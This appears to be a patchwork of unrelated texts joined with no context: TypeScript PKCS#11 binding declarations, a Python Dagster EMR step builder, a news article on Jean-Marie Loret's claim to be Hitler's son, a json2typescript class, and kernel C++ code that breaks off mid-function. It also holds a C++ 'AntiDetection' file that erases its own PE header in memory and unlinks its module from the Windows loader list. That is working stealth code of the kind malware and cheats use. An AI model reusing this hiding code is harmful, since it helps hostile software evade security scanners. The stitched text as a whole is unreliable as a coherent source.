null): Promise<Attributes>; get_template_async( attr_type: number, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; get_template_async( attr_type: number, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Attributes> | void; get_template_finish(result: Gio.AsyncResult): Attributes; hash(): number; set(attrs: Attributes, cancellable?: Gio.Cancellable | null): boolean; set(...args: never[]): never; set_async(attrs: Attributes, cancellable?: Gio.Cancellable | null): Promise<boolean>; set_async( attrs: Attributes, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; set_async( attrs: Attributes, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; set_finish(result: Gio.AsyncResult): boolean; set_template(attr_type: number, attrs: Attributes, cancellable?: Gio.Cancellable | null): boolean; set_template_async(attr_type: number, attrs: Attributes, cancellable?: Gio.Cancellable | null): Promise<boolean>; set_template_async( attr_type: number, attrs: Attributes, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; set_template_async( attr_type: number, attrs: Attributes, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; set_template_finish(result: Gio.AsyncResult): boolean; static from_handle(session: Session, object_handle: number): Object; } export module Password { export interface ConstructorProperties extends Gio.TlsPassword.ConstructorProperties { [key: string]: any; key: Object; module: Module; token: Slot; } } export class Password extends Gio.TlsPassword { static $gtype: GObject.GType<Password>; constructor(properties?: Partial<Password.ConstructorProperties>, ...args: any[]); _init(properties?: Partial<Password.ConstructorProperties>, ...args: any[]): void; // Properties key: 
Object; module: Module; token: Slot; // Members get_key(): Object; get_module(): Module; get_token(): Slot; } export module Session { export interface ConstructorProperties extends GObject.Object.ConstructorProperties { [key: string]: any; app_data: any; appData: any; handle: number; interaction: Gio.TlsInteraction; module: Module; opening_flags: number; openingFlags: number; options: SessionOptions; slot: Slot; } } export class Session extends GObject.Object implements Gio.AsyncInitable<Session>, Gio.Initable { static $gtype: GObject.GType<Session>; constructor(properties?: Partial<Session.ConstructorProperties>, ...args: any[]); _init(properties?: Partial<Session.ConstructorProperties>, ...args: any[]): void; // Properties app_data: any; appData: any; handle: number; interaction: Gio.TlsInteraction; module: Module; opening_flags: number; openingFlags: number; options: SessionOptions; slot: Slot; // Signals connect(id: string, callback: (...args: any[]) => any): number; connect_after(id: string, callback: (...args: any[]) => any): number; emit(id: string, ...args: any[]): void; connect(signal: "discard-handle", callback: (_source: this, handle: number) => boolean): number; connect_after(signal: "discard-handle", callback: (_source: this, handle: number) => boolean): number; emit(signal: "discard-handle", handle: number): void; // Members create_object(attrs: Attributes, cancellable?: Gio.Cancellable | null): Object; create_object_async(attrs: Attributes, cancellable?: Gio.Cancellable | null): Promise<Object>; create_object_async( attrs: Attributes, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; create_object_async( attrs: Attributes, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Object> | void; create_object_finish(result: Gio.AsyncResult): Object; decrypt( key: Object, mech_type: number, input: Uint8Array | string, cancellable?: Gio.Cancellable | null ): Uint8Array; 
decrypt_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable?: Gio.Cancellable | null ): Promise<Uint8Array>; decrypt_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; decrypt_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Uint8Array> | void; decrypt_finish(result: Gio.AsyncResult): Uint8Array; decrypt_full( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable?: Gio.Cancellable | null ): Uint8Array; derive_key(base: Object, mech_type: number, attrs: Attributes, cancellable?: Gio.Cancellable | null): Object; derive_key_async( base: Object, mechanism: Mechanism, attrs: Attributes, cancellable?: Gio.Cancellable | null ): Promise<Object>; derive_key_async( base: Object, mechanism: Mechanism, attrs: Attributes, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; derive_key_async( base: Object, mechanism: Mechanism, attrs: Attributes, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Object> | void; derive_key_finish(result: Gio.AsyncResult): Object; derive_key_full( base: Object, mechanism: Mechanism, attrs: Attributes, cancellable?: Gio.Cancellable | null ): Object; encrypt( key: Object, mech_type: number, input: Uint8Array | string, cancellable?: Gio.Cancellable | null ): Uint8Array; encrypt_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable?: Gio.Cancellable | null ): Promise<Uint8Array>; encrypt_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; encrypt_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable?: Gio.Cancellable | null, 
callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Uint8Array> | void; encrypt_finish(result: Gio.AsyncResult): Uint8Array; encrypt_full( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable?: Gio.Cancellable | null ): Uint8Array; enumerate_objects(match: Attributes): Enumerator; find_handles(match: Attributes, cancellable?: Gio.Cancellable | null): number[] | null; find_handles_async(match: Attributes, cancellable?: Gio.Cancellable | null): Promise<number[] | null>; find_handles_async( match: Attributes, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; find_handles_async( match: Attributes, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<number[] | null> | void; find_handles_finish(result: Gio.AsyncResult): number[] | null; find_objects(match: Attributes, cancellable?: Gio.Cancellable | null): Object[]; find_objects_async(match: Attributes, cancellable?: Gio.Cancellable | null): Promise<Object[]>; find_objects_async( match: Attributes, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; find_objects_async( match: Attributes, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Object[]> | void; find_objects_finish(result: Gio.AsyncResult): Object[]; generate_key_pair( mech_type: number, public_attrs: Attributes, private_attrs: Attributes, cancellable?: Gio.Cancellable | null ): [boolean, Object | null, Object | null]; generate_key_pair_async( mechanism: Mechanism, public_attrs: Attributes, private_attrs: Attributes, cancellable?: Gio.Cancellable | null ): Promise<[Object | null, Object | null]>; generate_key_pair_async( mechanism: Mechanism, public_attrs: Attributes, private_attrs: Attributes, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; generate_key_pair_async( mechanism: Mechanism, public_attrs: Attributes, 
private_attrs: Attributes, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<[Object | null, Object | null]> | void; generate_key_pair_finish(result: Gio.AsyncResult): [boolean, Object | null, Object | null]; generate_key_pair_full( mechanism: Mechanism, public_attrs: Attributes, private_attrs: Attributes, cancellable?: Gio.Cancellable | null ): [boolean, Object | null, Object | null]; get_handle(): number; get_info(): SessionInfo; get_interaction(): Gio.TlsInteraction | null; get_module(): Module; get_options(): SessionOptions; get_slot(): Slot; get_state(): number; init_pin(pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null): boolean; init_pin_async(pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null): Promise<boolean>; init_pin_async( pin: Uint8Array | null, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; init_pin_async( pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; init_pin_finish(result: Gio.AsyncResult): boolean; login(user_type: number, pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null): boolean; login_async(user_type: number, pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null): Promise<boolean>; login_async( user_type: number, pin: Uint8Array | null, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; login_async( user_type: number, pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; login_finish(result: Gio.AsyncResult): boolean; login_interactive( user_type: number, interaction?: Gio.TlsInteraction | null, cancellable?: Gio.Cancellable | null ): boolean; login_interactive_async( user_type: number, interaction?: Gio.TlsInteraction | null, cancellable?: Gio.Cancellable | null ): Promise<boolean>; 
login_interactive_async( user_type: number, interaction: Gio.TlsInteraction | null, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; login_interactive_async( user_type: number, interaction?: Gio.TlsInteraction | null, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; login_interactive_finish(result: Gio.AsyncResult): boolean; logout(cancellable?: Gio.Cancellable | null): boolean; logout_async(cancellable?: Gio.Cancellable | null): Promise<boolean>; logout_async(cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null): void; logout_async( cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; logout_finish(result: Gio.AsyncResult): boolean; set_interaction(interaction?: Gio.TlsInteraction | null): void; set_pin(old_pin?: Uint8Array | null, new_pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null): boolean; set_pin_async( old_pin: Uint8Array | null, n_old_pin: number, new_pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null ): Promise<boolean>; set_pin_async( old_pin: Uint8Array | null, n_old_pin: number, new_pin: Uint8Array | null, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; set_pin_async( old_pin: Uint8Array | null, n_old_pin: number, new_pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; set_pin_finish(result: Gio.AsyncResult): boolean; sign(key: Object, mech_type: number, input: Uint8Array | string, cancellable?: Gio.Cancellable | null): Uint8Array; sign_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable?: Gio.Cancellable | null ): Promise<Uint8Array>; sign_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable: Gio.Cancellable | null, callback: 
Gio.AsyncReadyCallback<this> | null ): void; sign_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Uint8Array> | void; sign_finish(result: Gio.AsyncResult): Uint8Array; sign_full( key: Object, mechanism: Mechanism, input: Uint8Array | string, n_result: number, cancellable?: Gio.Cancellable | null ): number; unwrap_key( wrapper: Object, mech_type: number, input: Uint8Array | string, attrs: Attributes, cancellable?: Gio.Cancellable | null ): Object; unwrap_key_async( wrapper: Object, mechanism: Mechanism, input: Uint8Array | string, attrs: Attributes, cancellable?: Gio.Cancellable | null ): Promise<Object>; unwrap_key_async( wrapper: Object, mechanism: Mechanism, input: Uint8Array | string, attrs: Attributes, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; unwrap_key_async( wrapper: Object, mechanism: Mechanism, input: Uint8Array | string, attrs: Attributes, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Object> | void; unwrap_key_finish(result: Gio.AsyncResult): Object; unwrap_key_full( wrapper: Object, mechanism: Mechanism, input: Uint8Array | string, attrs: Attributes, cancellable?: Gio.Cancellable | null ): Object; verify( key: Object, mech_type: number, input: Uint8Array | string, signature: Uint8Array | string, cancellable?: Gio.Cancellable | null ): boolean; verify_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, signature: Uint8Array | string, cancellable?: Gio.Cancellable | null ): Promise<boolean>; verify_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, signature: Uint8Array | string, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; verify_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, signature: Uint8Array | string, cancellable?: 
Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; verify_finish(result: Gio.AsyncResult): boolean; verify_full( key: Object, mechanism: Mechanism, input: Uint8Array | string, signature: Uint8Array | string, cancellable?: Gio.Cancellable | null ): boolean; wrap_key(wrapper: Object, mech_type: number, wrapped: Object, cancellable?: Gio.Cancellable | null): Uint8Array; wrap_key_async( wrapper: Object, mechanism: Mechanism, wrapped: Object, cancellable?: Gio.Cancellable | null ): Promise<Uint8Array>; wrap_key_async( wrapper: Object, mechanism: Mechanism, wrapped: Object, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; wrap_key_async( wrapper: Object, mechanism: Mechanism, wrapped: Object, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Uint8Array> | void; wrap_key_finish(result: Gio.AsyncResult): Uint8Array; wrap_key_full( wrapper: Object, mechanism: Mechanism, wrapped: Object, cancellable?: Gio.Cancellable | null ): Uint8Array; static from_handle(slot: Slot, session_handle: number, options: SessionOptions): Session; static open( slot: Slot, options: SessionOptions, interaction?: Gio.TlsInteraction | null, cancellable?: Gio.Cancellable | null ): Session; static open_async( slot: Slot, options: SessionOptions, interaction?: Gio.TlsInteraction | null, cancellable?: Gio.Cancellable | null ): Promise<Session>; static open_async( slot: Slot, options: SessionOptions, interaction: Gio.TlsInteraction | null, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<Session> | null ): void; static open_async( slot: Slot, options: SessionOptions, interaction?: Gio.TlsInteraction | null, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<Session> | null ): Promise<Session> | void; static open_finish(result: Gio.AsyncResult): Session; // Implemented Members init_async(io_priority: number, cancellable?: 
Gio.Cancellable | null): Promise<boolean>; init_async( io_priority: number, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; init_async( io_priority: number, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; init_finish(res: Gio.AsyncResult): boolean; new_finish(res: Gio.AsyncResult): Session; vfunc_init_async(io_priority: number, cancellable?: Gio.Cancellable | null): Promise<boolean>; vfunc_init_async( io_priority: number, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; vfunc_init_async( io_priority: number, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; vfunc_init_finish(res: Gio.AsyncResult): boolean; init(cancellable?: Gio.Cancellable | null): boolean; vfunc_init(cancellable?: Gio.Cancellable | null): boolean; } export module Slot { export interface ConstructorProperties extends GObject.Object.ConstructorProperties { [key: string]: any; handle: number; module: Module; } } export class Slot extends GObject.Object { static $gtype: GObject.GType<Slot>; constructor(properties?: Partial<Slot.ConstructorProperties>, ...args: any[]); _init(properties?: Partial<Slot.ConstructorProperties>, ...args: any[]): void; // Properties handle: number; module: Module; // Members enumerate_objects(match: Attributes, options: SessionOptions): Enumerator; equal(slot2: Slot): boolean; get_handle(): number; get_info(): SlotInfo; get_mechanism_info(mech_type: number): MechanismInfo; get_mechanisms(): number[]; get_module(): Module; get_token_info(): TokenInfo; has_flags(flags: number): boolean; hash(): number; match(uri: UriData): boolean; open_session(options: SessionOptions, cancellable?: Gio.Cancellable | null): Session; open_session_async(options: SessionOptions, cancellable?: Gio.Cancellable | null): Promise<Session>; open_session_async( options: SessionOptions, 
cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; open_session_async( options: SessionOptions, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Session> | void; open_session_finish(result: Gio.AsyncResult): Session; static from_handle(module: Module, slot_id: number): Slot; } export class Attribute { static $gtype: GObject.GType<Attribute>; constructor(attr_type: number, value: number, length: number); constructor(copy: Attribute); // Fields type: number; value: Uint8Array; length: number; // Constructors static ["new"](attr_type: number, value: number, length: number): Attribute; static new_boolean(attr_type: number, value: boolean): Attribute; static new_date(attr_type: number, value: GLib.Date): Attribute; static new_empty(attr_type: number): Attribute; static new_invalid(attr_type: number): Attribute; static new_string(attr_type: number, value: string): Attribute; static new_ulong(attr_type: number, value: number): Attribute; // Members clear(): void; dump(): void; dup(): Attribute; equal(attr2: Attribute): boolean; free(): void; get_boolean(): boolean; get_data(): Uint8Array; get_date(value: GLib.Date): void; get_string(): string | null; get_ulong(): number; hash(): number; init_copy(src: Attribute): void; is_invalid(): boolean; } export class Attributes { static $gtype: GObject.GType<Attributes>; constructor(reserved: number); constructor(copy: Attributes); // Constructors static ["new"](reserved: number): Attributes; // Members at(index: number): Attribute; contains(match: Attribute): boolean; count(): number; dump(): void; find(attr_type: number): Attribute; find_boolean(attr_type: number): [boolean, boolean]; find_date(attr_type: number): [boolean, GLib.Date]; find_string(attr_type: number): [boolean, string]; find_ulong(attr_type: number): [boolean, number]; ref(): Attributes; ref_sink(): Attributes; to_string(): string; unref(): void; } export class Builder { static 
$gtype: GObject.GType<Builder>; constructor(flags: BuilderFlags); constructor(copy: Builder); // Fields x: number[]; // Constructors static ["new"](flags: BuilderFlags): Builder; // Members add_all(attrs: Attributes): void; add_attribute(attr: Attribute): void; add_boolean(attr_type: number, value: boolean): void; add_data(attr_type: number, value?: Uint8Array | null): void; add_date(attr_type: number, value: GLib.Date): void; add_empty(attr_type: number): void; add_invalid(attr_type: number): void; add_only(attrs: Attributes, only_types: number[]): void; add_string(attr_type: number, value?: string | null): void; add_ulong(attr_type: number, value: number): void; clear(): void; copy(): Builder; end(): Attributes; find(attr_type: number): Attribute; find_boolean(attr_type: number): [boolean, boolean]; find_date(attr_type: number): [boolean, GLib.Date]; find_string(attr_type: number): [boolean, string]; find_ulong(attr_type: number): [boolean, number]; init(): void; init_full(flags: BuilderFlags): void; ref(): Builder; set_all(attrs: Attributes): void; set_boolean(attr_type: number, value: boolean): void; set_data(attr_type: number, value?: Uint8Array | null): void; set_date(attr_type: number, value: GLib.Date): void; set_empty(attr_type: number): void; set_invalid(attr_type: number): void; set_string(attr_type: number, value: string): void; set_ulong(attr_type: number, value: number): void; steal(): Attributes; take_data(attr_type: number, value?: Uint8Array | null): void; static unref(builder?: any | null): void; } export class EnumeratorPrivate { static $gtype: GObject.GType<EnumeratorPrivate>; constructor(copy: EnumeratorPrivate); } export class Mechanism { static $gtype: GObject.GType<Mechanism>; constructor( properties?: Partial<{ type?: number; parameter?: any; n_parameter?: number; }> ); constructor(copy: Mechanism); // Fields type: number; parameter: any; n_parameter: number; } export class MechanismInfo { static $gtype: GObject.GType<MechanismInfo>; 
constructor( properties?: Partial<{ min_key_size?: number; max_key_size?: number; flags?: number; }> ); constructor(copy: MechanismInfo); // Fields min_key_size: number; max_key_size: number; flags: number; // Members copy(): MechanismInfo; free(): void; } export class ModuleInfo { static $gtype: GObject.GType<ModuleInfo>; constructor( properties?: Partial<{ pkcs11_version_major?: number; pkcs11_version_minor?: number; manufacturer_id?: string; flags?: number; library_description?: string; library_version_major?: number; library_version_minor?: number; }> ); constructor(copy: ModuleInfo); // Fields pkcs11_version_major: number; pkcs11_version_minor: number; manufacturer_id: string; flags: number; library_description: string; library_version_major: number; library_version_minor: number; // Members copy(): ModuleInfo; free(): void; } export class ModulePrivate { static $gtype: GObject.GType<ModulePrivate>; constructor(copy: ModulePrivate); } export class ObjectPrivate { static $gtype: GObject.GType<ObjectPrivate>; constructor(copy: ObjectPrivate); } export class PasswordPrivate { static $gtype: GObject.GType<PasswordPrivate>; constructor(copy: PasswordPrivate); } export class SessionInfo { static $gtype: GObject.GType<SessionInfo>; constructor( properties?: Partial<{ slot_id?: number; state?: number; flags?: number; device_error?: number; }> ); constructor(copy: SessionInfo); // Fields slot_id: number; state: number; flags: number; device_error: number; // Members copy(): SessionInfo; free(): void; } export class SessionPrivate { static $gtype: GObject.GType<SessionPrivate>; constructor(copy: SessionPrivate); } export class SlotInfo { static $gtype: GObject.GType<SlotInfo>; constructor( properties?: Partial<{ slot_description?: string; manufacturer_id?: string; flags?: number; hardware_version_major?: number; hardware_version_minor?: number; firmware_version_major?: number; firmware_version_minor?: number; }> ); constructor(copy: SlotInfo); // Fields 
slot_description: string; manufacturer_id: string; flags: number; hardware_version_major: number; hardware_version_minor: number; firmware_version_major: number; firmware_version_minor: number; // Members copy(): SlotInfo; free(): void; } export class SlotPrivate { static $gtype: GObject.GType<SlotPrivate>; constructor(copy: SlotPrivate); } export class TokenInfo { static $gtype: GObject.GType<TokenInfo>; constructor( properties?: Partial<{ label?: string; manufacturer_id?: string; model?: string; serial_number?: string; flags?: number; max_session_count?: number; session_count?: number; max_rw_session_count?: number; rw_session_count?: number; max_pin_len?: number; min_pin_len?: number; total_public_memory?: number; free_public_memory?: number; total_private_memory?: number; free_private_memory?: number; hardware_version_major?: number; hardware_version_minor?: number; firmware_version_major?: number; firmware_version_minor?: number; utc_time?: number; }> ); constructor(copy: TokenInfo); // Fields label: string; manufacturer_id: string; model: string; serial_number: string; flags: number; max_session_count: number; session_count: number; max_rw_session_count: number; rw_session_count: number; max_pin_len: number; min_pin_len: number; total_public_memory: number; free_public_memory: number; total_private_memory: number; free_private_memory: number; hardware_version_major: number; hardware_version_minor: number; firmware_version_major: number; firmware_version_minor: number; utc_time: number; // Members copy(): TokenInfo; free(): void; } export class UriData { static $gtype: GObject.GType<UriData>; constructor(); constructor(copy: UriData); // Fields any_unrecognized: boolean; module_info: ModuleInfo; token_info: TokenInfo; attributes: Attributes; dummy: any[]; // Constructors static ["new"](): UriData; // Members copy(): UriData; free(): void; } export interface ObjectCacheNamespace { $gtype: GObject.GType<ObjectCache>; prototype: ObjectCachePrototype; } export 
type ObjectCache = ObjectCachePrototype; export interface ObjectCachePrototype extends Object { // Properties attributes: Attributes; // Members fill(attrs: Attributes): void; set_attributes(attrs?: Attributes | null): void; update(attr_types: number[], cancellable?: Gio.Cancellable | null): boolean; update_async(attr_types: number[], cancellable?: Gio.Cancellable | null): Promise<boolean>; update_async( attr_types: number[], cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; update_async( attr_types: number[], cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; update_finish(result: Gio.AsyncResult): boolean; vfunc_fill(attrs: Attributes): void; } export const ObjectCache: ObjectCacheNamespace;
def _get_execute_steps(self, context, solid_name):
    action_on_failure = self.config['action_on_failure']
    staging_bucket = self.config['staging_bucket']
    run_id = context.run_id
    local_root = os.path.dirname(os.path.abspath(self.config['pipeline_file']))
    steps = []

    requirements_file = self.config.get('requirements_file_path')
    if requirements_file and not os.path.exists(requirements_file):
        raise DagsterInvalidDefinitionError(
            'The requirements.txt file that was specified does not exist'
        )
    if not requirements_file:
        requirements_file = os.path.join(local_root, 'requirements.txt')
    if os.path.exists(requirements_file):
        with open(requirements_file, 'rb') as f:
            python_dependencies = six.ensure_str(f.read()).split('\n')
        steps.append(get_install_requirements_step(python_dependencies, action_on_failure))

    conf = dict(flatten_dict(self.config.get('spark_conf')))
    conf['spark.app.name'] = conf.get('spark.app.name', solid_name)

    check.invariant(
        conf.get('spark.master', 'yarn') == 'yarn',
        desc='spark.master is configured as %s; cannot set Spark master on EMR to anything '
        'other than "yarn"' % conf.get('spark.master'),
    )

    steps.append(
        {
            'Name': 'Execute Solid %s' % solid_name,
            'ActionOnFailure': action_on_failure,
            'HadoopJarStep': {
                'Jar': 'command-runner.jar',
                'Args': [
                    EMR_SPARK_HOME + 'bin/spark-submit',
                    '--master',
                    'yarn',
                    '--deploy-mode',
                    conf.get('spark.submit.deployMode', 'client'),
                ]
                + format_for_cli(list(flatten_dict(conf)))
                + [
                    '--py-files',
                    's3://%s/%s/pyspark.zip' % (staging_bucket, run_id),
                    's3://%s/%s/main.py' % (staging_bucket, run_id),
                ],
            },
        }
    )

    return steps
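The step builder above relies on two helpers, `flatten_dict` and `format_for_cli`, to turn the nested `spark_conf` mapping into `--conf key=value` arguments for `spark-submit`. A minimal sketch of how such helpers might behave (the actual Dagster implementations may differ; these names and shapes are inferred from how they are called above):

```python
def flatten_dict(d, prefix=""):
    """Flatten nested dicts into dotted-key pairs,
    e.g. {'spark': {'app': {'name': 'x'}}} -> ('spark.app.name', 'x')."""
    for key, value in d.items():
        dotted = f"{prefix}.{key}" if prefix else key
        if isinstance(value, dict):
            yield from flatten_dict(value, dotted)
        else:
            yield (dotted, value)


def format_for_cli(pairs):
    """Render flattened conf pairs as spark-submit '--conf key=value' arguments."""
    args = []
    for key, value in pairs:
        args += ["--conf", f"{key}={value}"]
    return args
```

For example, `format_for_cli(list(flatten_dict({"spark": {"executor": {"memory": "4g"}}})))` yields `["--conf", "spark.executor.memory=4g"]`, which slots directly into the `Args` list of the EMR step.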
(Image Credit: Getty Images) Until his death in 1985, Jean-Marie Loret believed that he was the only son of Adolf Hitler. There is now renewed attention to evidence from France and Germany that apparently lends some credence to his claim. Loret collected information from two studies, one conducted by the University of Heidelberg in 1981 and another by a handwriting analyst, which showed that Loret's blood type and handwriting, respectively, were similar to those of the Nazi dictator, who died childless in 1945 at age 56. The evidence is inconclusive, but Loret's story itself was riveting enough to warrant some investigation. The French magazine Le Point published an account last week of Loret's story, as he told it to Parisian lawyer Francois Gibault in 1979. "Master, I am the son of Hitler! Tell me what I should do," Loret told Gibault, according to Le Point. Le Point recounts Gibault's reaction: the "Paris lawyer does not believe his ears. The man before him is rather large, speaks perfect French without an accent, and is not a crackpot. His astonishing story is no less true." Loret claimed that his mother, Charlotte Lobjoie, met Hitler in 1914, when he was a corporal in the German army and she was 16. She described Hitler as "attentive and friendly." She and Hitler would take walks in the countryside, although conversation was often complicated by the language barrier. Yet, despite their differences, after an inebriated night in June 1917, little Jean-Marie was born in March 1918, according to Loret. Neither Loret nor the rest of his mother's family knew the circumstances of his birth until the early 1950s, when she confessed to her son that Hitler was his father. She had given her only son up for adoption in 1930 but stayed in touch with him, according to Loret. After this revelation, according to Le Point, Loret began his journey to find out whether the story was true, researching with a near-manic determination.
He enlisted geneticists, handwriting experts and historians. He wrote a book, "Your Father's Name Was Hitler," that details that journey. It will now be republished to include the new studies that Loret believed confirmed his claim.
#include "AntiDetection.h"
#include <Windows.h>

HMODULE GetSelfModuleHandle()
{
    MEMORY_BASIC_INFORMATION mbi;
    return ((::VirtualQuery(GetSelfModuleHandle, &mbi, sizeof(mbi)) != 0)
        ? (HMODULE)mbi.AllocationBase : NULL);
}

void HideModule(void* pModule)
{
    void* pPEB = nullptr;
    _asm {
        push eax
        mov eax, fs:[0x30]
        mov pPEB, eax
        pop eax
    }
    void* pLDR = *((void**)((unsigned char*)pPEB + 0xc));
    void* pCurrent = *((void**)((unsigned char*)pLDR + 0x0c));
    void* pNext = pCurrent;
    do {
        void* pNextPoint = *((void**)((unsigned char*)pNext));
        void* pLastPoint = *((void**)((unsigned char*)pNext + 0x4));
        void* nBaseAddress = *((void**)((unsigned char*)pNext + 0x18));
        if (nBaseAddress == pModule) {
            *((void**)((unsigned char*)pLastPoint)) = pNextPoint;
            *((void**)((unsigned char*)pNextPoint + 0x4)) = pLastPoint;
            pCurrent = pNextPoint;
        }
        pNext = *((void**)pNext);
    } while (pCurrent != pNext);
}

AntiDetection::AntiDetection()
{
    // Clear up PE headers.
    HMODULE hModule = GetSelfModuleHandle();
    DWORD dwMemPro;
    VirtualProtect((void*)hModule, 0x1000, PAGE_EXECUTE_READWRITE, &dwMemPro);
    memset((void*)hModule, 0, 0x1000);
    VirtualProtect((void*)hModule, 0x1000, dwMemPro, &dwMemPro);
    OutputDebugStringA("CleanUp PEheader Success.");

    HideModule(hModule);
    OutputDebugStringA("Cutup PEB link success.");
}
import {JsonObject, JsonProperty} from 'json2typescript'; import {ApiLyric} from './apiLyric'; @JsonObject('Song') export class ApiSong { @JsonProperty('title', String) public title: string = null; @JsonProperty('url', String) public url: string = null; @JsonProperty('cover', String) public cover: string = null; @JsonProperty('lyrics', [ApiLyric]) public lyrics: ApiLyric[] = null; }
//
// Copyright 1998-2012 <NAME>
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//

#include "AddressSpace.h"
#include "cpu_asm.h"
#include "KernelDebug.h"
#include "stdio.h"
#include "Team.h"
#include "Thread.h"

List Team::fTeamList;

Team::Team(const char name[])
    : Resource(OBJ_TEAM, name),
      fThreadList(0)
{
    fAddressSpace = new AddressSpace;
    cpu_flags fl = DisableInterrupts();
    fTeamList.AddToTail(this);
    RestoreInterrupts(fl);
}

Team::~Team()
{
    cpu_flags fl = DisableInterrupts();
    fTeamList.Remove(this);
    RestoreInterrupts(fl);
    delete fAddressSpace;
}

void Team::ThreadCreated(Thread *thread)
{
    AcquireRef();
    cpu_flags fl = DisableInterrupts();
    thread->fTeamListNext = fThreadList;
    fThreadList = thread;
    thread->fTeamListPrev = &fThreadList;
    if (thread->fTeamListNext)
        thread->fTeamListNext->fTeamListPrev = &thread->fTeamListNext;
    RestoreInterrupts(fl);
}

void Team::ThreadTerminated(Thread *thread)
{
    cpu_flags fl = DisableInterrupts();
    *thread->fTeamListPrev = thread->fTeamListNext;
    if (thread->fTeamListNext)
